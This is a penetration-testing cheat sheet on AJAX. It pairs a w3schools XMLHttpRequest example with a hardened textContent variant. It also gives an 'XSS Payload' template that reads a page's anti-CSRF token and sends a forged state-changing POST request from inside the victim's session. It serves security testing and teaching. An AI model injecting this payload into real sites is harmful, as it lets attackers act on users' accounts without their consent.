Cheat sheet and tricks for AJAX (Asynchronous JavaScript and XML). Ajax is a set of web development techniques that use various web technologies on the client side to create asynchronous web applications. With Ajax, web applications can send and retrieve data from a server asynchronously without interfering with the display and behaviour of the existing page. This allows a page to:
- Read data from a web server after the page has loaded
- Update a web page without reloading the page
- Send data to a web server in the background
XSS Payload
This must be adapted to the application tested.
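<script>
// The token is read from the page's own form field, so the request
// carries a valid anti-CSRF token for the current session.
$.ajax({
    type: "POST",
    url: "/somepath",
    data: "_method=patch&token=" + $('input[name="token"]').val() + "&param1=value1&param2=value2",
    success: function () {
        javascript:alert('XSS worked!')
    }
});
</script>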
Examples
See AJAX Introduction (w3schools).
This file can be hosted on the Apache Web Server on Kali.
GET
Try it using the IDE on w3schools.
<!DOCTYPE html>
<html>
<body>
<div id="demo">
    <h2>The XMLHttpRequest Object</h2>
    <button type="button" onclick="loadDoc()">Change Content</button>
</div>
<script>
function loadDoc() {
    const xhttp = new XMLHttpRequest();
    xhttp.onload = function() {
        document.getElementById("demo").innerHTML =
            this.responseText;
    }
    xhttp.open("GET", "/");
    xhttp.send();
}
</script>
</body>
</html>
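The `loadDoc()` example above assigns the response to `innerHTML`, so any markup in the response body is parsed into the page. A hardened variant follows, added here as an example and not part of the original page; `loadDocSafe` and its `doc`, `XHR` and `url` parameters are names assumed for illustration.

```javascript
// Added example: hardened variant of the page's loadDoc().
// `doc`, `XHR` and `url` are parameters introduced here (assumptions) so the
// function can be driven with stand-ins outside a browser. In a page, calling
// loadDocSafe() with no arguments uses the real document and XMLHttpRequest.
function loadDocSafe(doc = document, XHR = XMLHttpRequest, url = "/") {
  const target = doc.getElementById("demo");
  const xhttp = new XHR();

  xhttp.onload = function () {
    // Do not render error pages: they often reflect request data.
    if (this.status !== 200) {
      target.textContent = "Request failed (" + this.status + ")";
      return;
    }
    // textContent creates a single text node. Tags and event-handler
    // attributes in the response are displayed literally instead of being
    // parsed into elements, which is what innerHTML would do.
    target.textContent = this.responseText;
  };

  xhttp.open("GET", url);
  xhttp.send();
  return xhttp;
}
```

If the response really has to be inserted as markup, sanitize it against an allow-list before assigning it, and pair that with a Content-Security-Policy that blocks inline script.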